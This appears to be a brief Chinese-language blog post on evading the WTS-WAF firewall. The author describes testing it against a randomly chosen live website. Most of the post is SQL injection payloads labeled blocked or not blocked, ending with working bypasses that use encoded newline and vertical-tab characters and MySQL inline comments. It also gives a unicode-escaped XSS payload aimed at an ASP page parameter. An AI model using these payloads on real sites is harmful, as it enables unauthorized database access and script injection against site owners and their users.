WTS-WAF Bypass technical stuff

你们要的干货(我知道已经鸽了一天了)

和一位表哥撸站时遇到wts-waf,在这之前这破玩意也恶心我很久了。今天正巧有时间,记一下bypass方式。

我一直在好奇这吊玩意能从哪下到,最后决定直接随手找个站演示算了。

‘ union select 拦截

So this means we’ll got a pretty hard time.

‘ union%20%0aselect 不拦截

‘ union%20%0aselect 123 不拦截
‘ union%20%0aselect 123 from 不拦截
‘ union%20%0aselect 123 from 0xccc 拦截
‘ union%20%0aselect 123/*!from%0b 0xccccc*/ 不拦截

It actually works.

看上去我们需要添加0a0c0b之类的字符或者利用内联注释绕过。

解决sql, 下一步大概是xss了

xss的话应该只需要unicode转义就没有什么大问题了。

There’s one thing to do: keep popping windows.

/Aboutus.asp?Title=%3C%u0073%u0063%u0072iPt%3E%u0061lert(1)%3C/%u0073%u0063%u0072iPt%3E

老生常谈的传统绕过手法。

大概还会更新?
不说了, 先去刷会P站要紧。
web貌似已经搞了有一段时间了,一直感觉需要一些新的东西让自己没那么无聊,所以决定转二进制,所以应该会post一些二进制的东西。
所以说各位晚安www

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *